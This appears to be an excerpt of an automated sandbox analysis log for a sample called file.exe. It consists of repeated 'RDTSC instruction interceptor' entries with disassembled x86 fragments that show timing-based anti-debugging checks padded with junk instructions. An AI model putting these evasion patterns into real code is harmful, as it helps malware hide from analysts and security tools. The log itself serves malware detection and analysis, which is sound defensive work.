Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C058CD second address: C058DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F927881D80Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C05A75 second address: C05A7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C05A7B second address: C05A7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C05A7F second address: C05A8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F9278BE2826h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C05BEA second address: C05BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C05BF0 second address: C05BF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C05D3F second address: C05D43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C05D43 second address: C05D47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C05D47 second address: C05D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C05D51 second address: C05D64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C05D64 second address: C05D6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C05E9E second address: C05EAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F9278BE283Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C05EAD second address: C05EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F927881D813h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C05EC4 second address: C05EDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9278BE2836h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C068D5 second address: C068DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C068DB second address: C068E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C068E3 second address: C068FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F927881D811h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C06EC7 second address: C06ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C06ECD second address: C06ED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C06ED1 second address: C06EFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2835h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnc 00007F9278BE2826h 0x00000012 push edx 0x00000013 pop edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C06EFE second address: C06F02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C09186 second address: C091AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9278BE2839h 0x00000009 pop ecx 0x0000000a jnl 00007F9278BE2828h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD1DD8 second address: BD1E08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F927881D806h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F927881D80Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F927881D813h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0A691 second address: C0A695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C10F87 second address: C10F8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C103B2 second address: C103C7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F9278BE2826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jno 00007F9278BE2828h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C103C7 second address: C103CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C103CD second address: C103E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F9278BE2826h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f jbe 00007F9278BE282Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C10C16 second address: C10C21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C10C21 second address: C10C37 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9278BE2826h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jne 00007F9278BE2826h 0x00000013 push edi 0x00000014 pop edi 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C10C37 second address: C10C6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F927881D819h 0x0000000a jmp 00007F927881D811h 0x0000000f popad 0x00000010 jnp 00007F927881D818h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C10DBE second address: C10DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C10DC2 second address: C10DC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C14150 second address: C1415A instructions: 0x00000000 rdtsc 0x00000002 je 00007F9278BE2826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C14487 second address: C14499 instructions: 0x00000000 rdtsc 0x00000002 js 00007F927881D806h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C14499 second address: C1449F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1449F second address: C144A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C144A5 second address: C144A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1453F second address: C14544 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1480F second address: C14827 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2834h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C148BB second address: C148BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C148BF second address: C148C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C148C5 second address: C148CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C148CB second address: C148CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C14DEB second address: C14E09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 jl 00007F927881D813h 0x0000000c jmp 00007F927881D80Dh 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C14E56 second address: C14E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F9278BE282Dh 0x0000000c popad 0x0000000d mov dword ptr [esp], ebx 0x00000010 mov dword ptr [ebp+122D23F6h], ecx 0x00000016 nop 0x00000017 push esi 0x00000018 push ecx 0x00000019 jnc 00007F9278BE2826h 0x0000001f pop ecx 0x00000020 pop esi 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C14E86 second address: C14E9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D815h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C15048 second address: C1504E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C15450 second address: C15460 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F927881D80Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C15460 second address: C15464 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C159CE second address: C159D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C159D4 second address: C159D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C159D8 second address: C159DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C159DC second address: C159FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9278BE2835h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1626F second address: C16276 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C16C3E second address: C16C4D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007F9278BE2826h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C17EF0 second address: C17EF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C17EF4 second address: C17EFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C17EFA second address: C17F15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jns 00007F927881D80Ch 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C18BA0 second address: C18BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C19561 second address: C19565 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C19565 second address: C195E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9278BE2830h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F9278BE2828h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 jmp 00007F9278BE282Ch 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007F9278BE2828h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a push 00000000h 0x0000004c jl 00007F9278BE282Ch 0x00000052 add dword ptr [ebp+122D582Eh], ecx 0x00000058 xchg eax, ebx 0x00000059 push eax 0x0000005a push edx 0x0000005b push esi 0x0000005c pushad 0x0000005d popad 0x0000005e pop esi 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C19F0C second address: C19F12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1AD14 second address: C1AD22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1AD22 second address: C1AD26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1AD26 second address: C1AD3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2831h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C208DF second address: C208E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C208E4 second address: C208F9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9278BE282Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C236EF second address: C23701 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F927881D80Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C208F9 second address: C208FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C23D97 second address: C23D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C23F61 second address: C23F66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C25F78 second address: C25F7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C25F7C second address: C25F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C25139 second address: C25179 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F927881D819h 0x00000008 jc 00007F927881D806h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 jbe 00007F927881D824h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F927881D812h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C26E40 second address: C26E46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C27D92 second address: C27DFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F927881D808h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 push 00000000h 0x00000024 mov di, dx 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ecx 0x0000002c call 00007F927881D808h 0x00000031 pop ecx 0x00000032 mov dword ptr [esp+04h], ecx 0x00000036 add dword ptr [esp+04h], 0000001Dh 0x0000003e inc ecx 0x0000003f push ecx 0x00000040 ret 0x00000041 pop ecx 0x00000042 ret 0x00000043 mov ebx, dword ptr [ebp+12476A3Eh] 0x00000049 push eax 0x0000004a jng 00007F927881D825h 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C26FE3 second address: C26FE8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C28E2D second address: C28E91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007F927881D815h 0x0000000f push 00000000h 0x00000011 or di, 4BF1h 0x00000016 push 00000000h 0x00000018 jns 00007F927881D80Ch 0x0000001e add ebx, dword ptr [ebp+122D398Bh] 0x00000024 xchg eax, esi 0x00000025 pushad 0x00000026 jmp 00007F927881D818h 0x0000002b jc 00007F927881D808h 0x00000031 pushad 0x00000032 popad 0x00000033 popad 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 jng 00007F927881D806h 0x0000003e pushad 0x0000003f popad 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C27F54 second address: C27F5E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9278BE2826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C29EFD second address: C29F02 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C29F02 second address: C29F14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F9278BE2828h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2E08C second address: C2E091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2E091 second address: C2E097 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2E097 second address: C2E09B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2E09B second address: C2E130 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F9278BE282Dh 0x0000000e nop 0x0000000f push edi 0x00000010 push eax 0x00000011 mov edi, dword ptr [ebp+122D2136h] 0x00000017 pop edi 0x00000018 pop ebx 0x00000019 push 00000000h 0x0000001b mov dword ptr [ebp+122D230Eh], ecx 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push ebx 0x00000026 call 00007F9278BE2828h 0x0000002b pop ebx 0x0000002c mov dword ptr [esp+04h], ebx 0x00000030 add dword ptr [esp+04h], 0000001Ah 0x00000038 inc ebx 0x00000039 push ebx 0x0000003a ret 0x0000003b pop ebx 0x0000003c ret 0x0000003d and ebx, dword ptr [ebp+122D3B8Bh] 0x00000043 jmp 00007F9278BE282Ah 0x00000048 xchg eax, esi 0x00000049 pushad 0x0000004a jmp 00007F9278BE282Eh 0x0000004f pushad 0x00000050 push esi 0x00000051 pop esi 0x00000052 jmp 00007F9278BE2838h 0x00000057 popad 0x00000058 popad 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e jns 00007F9278BE2826h 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2E130 second address: C2E147 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D813h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2B207 second address: C2B20C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2C3B2 second address: C2C3BC instructions: 0x00000000 rdtsc 0x00000002 jne 00007F927881D806h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2C3BC second address: C2C3C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2A14A second address: C2A14F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2F187 second address: C2F191 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9278BE2826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2F191 second address: C2F197 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2F197 second address: C2F19B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
